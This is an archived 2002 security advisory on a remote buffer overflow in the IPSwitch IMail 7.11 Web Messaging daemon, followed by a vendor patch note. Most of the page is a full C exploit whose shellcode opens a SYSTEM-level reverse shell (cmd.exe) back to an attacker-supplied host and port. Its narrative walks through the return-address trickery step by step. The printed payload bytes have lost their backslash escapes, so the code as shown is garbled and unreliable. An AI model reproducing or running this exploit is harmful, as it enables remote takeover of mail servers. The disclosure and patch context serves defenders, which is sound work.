


IPSwitch IMail Server remote overflow



29th Jul 2002 [SBWID-5565]
COMMAND

	IPSwitch IMail Server remote overflow

SYSTEMS AFFECTED

	IMail Server 7.1, 7.11 w/o HF1

PROBLEM

	In '2c79cbe14ac7d0b8472d3f129fa1df55' Security Advisory #5 :
	

	There is an overflow present in the GET  parameter  under  the  HTTP/1.0
	specification in the Web Messaging  daemon  in  all  IMail  versions  to
	date.. HTTP/0.9 & HTTP/1.1 are not vulnerable,  as  they  have  been
	fixed in a previous bug report.. oops, forgot one :>
	

	 #EXPLOITATION

	

	<96 bytes><EBP><EIP>

	

	choosing right causes no problems, soooo....
	

	as none of the registers point to our payload on ret  some  trickery  is
	necessary to hit our payload in a dynamic way..  nothing  too  difficult
	however
	

	esp is 8 bytes from our payload, but  it  has  to  run  right  over  our
	chosen ret (call/jmp esp).. so flat  out  jmping  esp  has  some  shitty
	near-impossible odds working against it.. so we  need  to  do  some  sex
	first
	

	execution flow:
	

	eip overran, ret (esp-4) -> (imailsec.dll) land at pop

	ebx, ret10 (esp-18) -> (imailsec.dll) call esp

	

	after only 3 redirections we've now got esp pointing  at  our  corrupted
	payload.. YUMMY!
	

	preserve esp -> sub esp -> jmp esp
	

	we preserve esp to prevent our stack from running right over  our  code,
	then we jump relative to our good payload.. ooohh you know whats  coming
	next
	

	recover esp -> execute shell
	

	now that the stack is out of the way, we can just let the shit fly..
	

	see attached exploit.. target imail version  is  7.11  (HF1  applied  or
	not)
	

	

	 Exploit :

	 =======

	

	/*

	        imailexp.c

	        July 25th, 2002

	

	        IPSwitch IMail 7.11 remote 'SYSTEM' exploit

	

	        there is an overflow in the GET parameter under the HTTP/1.0

	        specification in the Web Messaging daemon in all IMail versions

	        to date

	

	        <96 bytes><EBP><EIP>

		

		since none of the registers point to our payload on ret some

		trickery was necessary to hit our payload in a dynamic way,

		but nothing difficult..

	

		execution flow:	

		eip overran, ret (esp-4) -> land at pop ebx, ret10 (esp-18) -> call esp	

		reach corrupted payload	

	

		preserve esp -> sub esp -> jmp esp	

		preserve esp, and jump to good payload

	

		recover esp -> execute shell

		let shit fly

	

	        "In 1995, Ipswitch released IMail Server, the first commercial NT Mail Server.

	        Seven years later there are over 49 million users of IMail worldwide.

	

	        IMail Server 7.1

	        Greater security, improved usability, and new revenue opportunities for service

	        providers."

	

	        7 years in development, 20 minutes of BuffSex v0.3(tm), 4 remote 'root' holes

	

	        2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <arpa/inet.h>

	#include <netdb.h>

	#include <sys/errno.h>

	#include <unistd.h>

	

	// dark spyrit's shell as per usual.. queerly modified to call ExitThread

	// yet again.. all that shit on top is to get us home

	// Request buffer sent to the Web Messaging port. NOTE(review): as reproduced on this
	// page every backslash has been stripped from the source (the printf strings below
	// show the same loss, e.g. "...level)n"), so a literal such as "x47x45x54x20" is twelve
	// ASCII characters here rather than the four bytes 'G','E','T',' ' it presumably
	// encoded; the array as printed is plain text and the fixed offsets patched into it
	// by main() (747..755) no longer line up with any particular field.
	// Read as bytes, the shape is: "GET ", a long run of 0x90 filler, the author's
	// redirection/shell bytes, and a trailing " HTTP/1.0\r\n\r\n" (last literal) -- i.e.
	// an oversized HTTP/1.0 request line on the Web Messaging port, which is the
	// pattern a defender would look for in logs or a WAF/IDS signature.
	unsigned char payload[] =

	"x47x45x54x20x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x24x01x10x90x90x90x90x13xf7x02x10"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x8bxfcx81xc4x11x11x11x11x81xec"

	"x50xddx10x11xffxe4x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

	"x8bxe7xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90x90"

	"x8bxc5x33xc9x66xb9xdbx02x50x80x30x95x40xe2xfax2dx95x95"

	"x64xe2x14xadxd8xcfx05x95xe1x96xddx7ex60x7dx95x95x95x95"

	"xc8x1ex40x14x7fx9ax6bx6ax6ax1ex4dx1exe6xa9x96x66x1exe3"

	"xedx96x66x1exebxb5x96x6ex1exdbx81xa6x78xc3xc2xc4x1exaa"

	"x96x6ex1ex67x2cx9bx95x95x95x66x33xe1x9dxccxcax16x52x91"

	"xd0x77x72xccxcaxcbx1ex58x1exd3xb1x96x56x44x74x96x54xa6"

	"x5cxf3x1ex9dx1exd3x89x96x56x54x74x97x96x54x1ex95x96x56"

	

	"x1ex67x1ex6bx1ex45x2cx9ex95x95x95x7dxe1x94x95x95xa6x55"

	"x39x10x55xe0x6cxc7xc3x6axc2x41xcfx1ex4dx2cx93x95x95x95"

	"x7dxcex94x95x95x52xd2xf1x99x95x95x95x52xd2xfdx95x95x95"

	"x95x52xd2xf9x94x95x95x95xffx95x18xd2xf1xc5x18xd2x85xc5"

	"x18xd2x81xc5x6axc2x55xffx95x18xd2xf1xc5x18xd2x8dxc5x18"

	"xd2x89xc5x6axc2x55x52xd2xb5xd1x95x95x95x18xd2xb5xc5x6a"

	"xc2x51x1exd2x85x1cxd2xc9x1cxd2xf5x1exd2x89x1cxd2xcdx14"

	"xdaxd9x94x94x95x95xf3x52xd2xc5x95x95x18xd2xe5xc5x18xd2"

	"xb5xc5xa6x55xc5xc5xc5xffx94xc5xc5x7dx95x95x95x95xc8x14"

	"x78xd5x6bx6ax6axc0xc5x6axc2x5dx6axe2x85x6axc2x71x6axe2"

	"x89x6axc2x71xfdx95x91x95x95xffxd5x6axc2x45x1ex7dxc5xfd"

	"x94x94x95x95x6axc2x7dx10x55x9ax10x3fx95x95x95xa6x55xc5"

	"xd5xc5xd5xc5x6axc2x79x16x6dx6ax9ax11x02x95x95x95x1ex4d"

	"xf3x52x92x97x95xf3x52xd2x97x80x26x52xd2x91x55x3dx95x94"

	"xffx85x18x92xc5xc6x6axc2x61xffxa7x6axc2x49xa6x5cxc4xc3"

	"xc4xc4xc4x6axe2x81x6axc2x59x10x55xe1xf5x05x05x05x05x15"

	"xabx95xe1xbax05x05x05x05xffx95xc3xfdx95x91x95x95xc0x6a"

	"xe2x81x6axc2x4dx10x55xe1xd5x05x05x05x05xffx95x6axa3xc0"

	"xc6x6axc2x6dx16x6dx6axe1xbbx05x05x05x05x7ex27xffx95xfd"

	"x95x91x95x95xc0xc6x6axc2x69x10x55xe9x8dx05x05x05x05xe1"

	"x09xffx95xc3xc5xc0x6axe2x8dx6axc2x41xffxa7x6axc2x49x7e"

	"x1fxc6x6axc2x65xffx95x6axc3x98xa6x55x39x10x55xe0x6cxc4"

	"xc7xc3xc6x6ax47xcfxccx3ex77x7bx56xd2xf0xe1xc5xe7xfaxf6"

	"xd4xf1xf1xe7xf0xe6xe6x95xd9xfaxf4xf1xd9xfcxf7xe7xf4xe7"

	"xecxd4x95xd6xe7xf0xf4xe1xf0xc5xfcxe5xf0x95xd2xf0xe1xc6"

	"xe1xf4xe7xe1xe0xe5xdcxfbxf3xfaxd4x95xd6xe7xf0xf4xe1xf0"

	"xc5xe7xfaxf6xf0xe6xe6xd4x95xc5xf0xf0xfexdbxf4xf8xf0xf1"

	"xc5xfcxe5xf0x95xd2xf9xfaxf7xf4xf9xd4xf9xf9xfaxf6x95xc2"

	"xe7xfcxe1xf0xd3xfcxf9xf0x95xc7xf0xf4xf1xd3xfcxf9xf0x95"

	"xc6xf9xf0xf0xe5x95xedxedxedxedxedxedxedxedxedxedxedx95"

	"xd6xf9xfaxe6xf0xddxf4xfbxf1xf9xf0x95xc2xc6xdaxd6xdexa6"

	"xa7x95xc2xc6xd4xc6xe1xf4xe7xe1xe0xe5x95xe6xfaxf6xfexf0"

	"xe1x95xf6xf9xfaxe6xf0xe6xfaxf6xfexf0xe1x95xf6xfaxfbxfb"

	"xf0xf6xe1x95xe6xf0xfbxf1x95xe7xf0xf6xe3x95xf6xf8xf1xbb"

	"xf0xedxf0x95xc9x1dxdcx95x20x48x54x54x50x2Fx31x2Ex30x0d"

	"x0ax0dx0a";

	

	/*
	 * Entry point: argv[1]/argv[2] are the target host and Web Messaging port,
	 * argv[3]/argv[4] the callback host and port. The callback address and port are
	 * XOR-masked with 0x95 bytes and written into fixed offsets of payload[], then the
	 * whole buffer is sent over one TCP connection and the socket is closed.
	 *
	 * Review notes (code as printed on this page):
	 *  - `argc` is declared `char` and the return type is implicit int; neither is
	 *    standard C.
	 *  - `i`, `bufsize` and `buffer` are never used; the malloc() result is leaked.
	 *  - `sin` is never zeroed before its fields are filled in.
	 *  - Every "\n" in the printf strings has been lost along with the backslashes
	 *    (they print as a bare "n"); they are runtime strings and left as-is here.
	 */
	main(char argc, char **argv){

		unsigned long ah;

		unsigned short int ap;

	        int fd, i;

	        int bufsize = 1024;

	        int *buffer = (int *)malloc(bufsize);  // never used or freed

	        struct sockaddr_in sin;

	        struct hostent *he;

	        struct in_addr in;

	

		printf("IMail 7.11 remote exploit (SYSTEM level)n");

		printf("2c79cbe14ac7d0b8472d3f129fa1df55 (c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)nn");

	

	        if (argc < 5){

	                printf("usage: %s <targethost> <iwebport> <localhost> <localport>nn", argv[0]);

	                printf("iwebport: IMail Web Messaging port (default 8383)nn");

	                exit(-1);

	        }

	

	        // callback port, network byte order, masked with 0x95 per byte
	        ap  = htons(atoi(argv[4]));

	        ap ^= 0x9595;

	

	        // NOTE(review): resolves argv[3] but reports the failure under argv[2]
	        if ((he = gethostbyname(argv[3])) == 0){herror(argv[2]);exit(-1);}

	

	        // NOTE(review): h_addr is h_length (4 for AF_INET) bytes; reading it through an
	        // unsigned long over-reads on LP64 hosts and breaks strict aliasing. Only the
	        // low four bytes are consumed below.
	        ah  = *((unsigned long *)he->h_addr);

	        ah ^= 0x95959595;

	                                

	        // fixed offsets into payload[]; see the note on payload[] about the lost escapes
	        payload[747] = ((ap) & 0xff);

	        payload[748] = ((ap >> 8) & 0xff);

	        

	        payload[752] = ((ah) & 0xff);

	        payload[753] = ((ah >> 8) & 0xff);

	        payload[754] = ((ah >> 16) & 0xff);

	        payload[755] = ((ah >> 24) & 0xff);

	

		if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){perror("socket error");exit(-1);}

		

		if ((he = gethostbyname(argv[1])) != NULL){memcpy (&in, he->h_addr, he->h_length);}

		else

		// NOTE(review): inet_aton() returns 0 on failure, never a negative value, so this
		// test cannot fire and an unresolvable argv[1] falls through with `in` unset.
		if ((inet_aton(argv[1], &in)) < 0){printf("unable to resolve host");exit(-1);}

	

	        sin.sin_family = AF_INET;

	        // round-trips the address through text; equivalent to assigning in.s_addr
	        sin.sin_addr.s_addr = inet_addr(inet_ntoa(in));

	        sin.sin_port = htons(atoi(argv[2]));

			

		printf("ret: 0x10012490 (IMailsec.dll v.2.6.17.28)nn");

		printf("connecting...");

	

		if(connect(fd, (struct sockaddr *)&sin, sizeof(sin)) < 0){perror("connection error");exit(-1);}

		

		printf("done.n");

		

		sleep(1);

		

		printf("dumping payload...");

		// NOTE(review): strlen() stops at the first 0x00 byte, and the ssize_t result of
		// write() is promoted to size_t for the comparison, so a -1 return (SIZE_MAX)
		// is not caught by this check.
		if(write(fd, payload, strlen(payload)) < strlen(payload)){perror("write error");exit(-1);}

		printf("done.nn");

	

		printf("cmd.exe spawned to [%s:%s]nn", argv[3], argv[4]);

		

		close(fd);

	

	}

	

SOLUTION

	 Update (02 August 2002)

	 ======

	

	Ipswitch released IMail Version 7.12, which  solves  the  buffer  overflow
	bug in the Web Messaging Daemon.
	

	IMail Version 7.12 Release Notes:
	

	http://support.ipswitch.com/kb/IM-20020731-DM02.htm

	

	Download:
	

	ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail712.exe

	

	

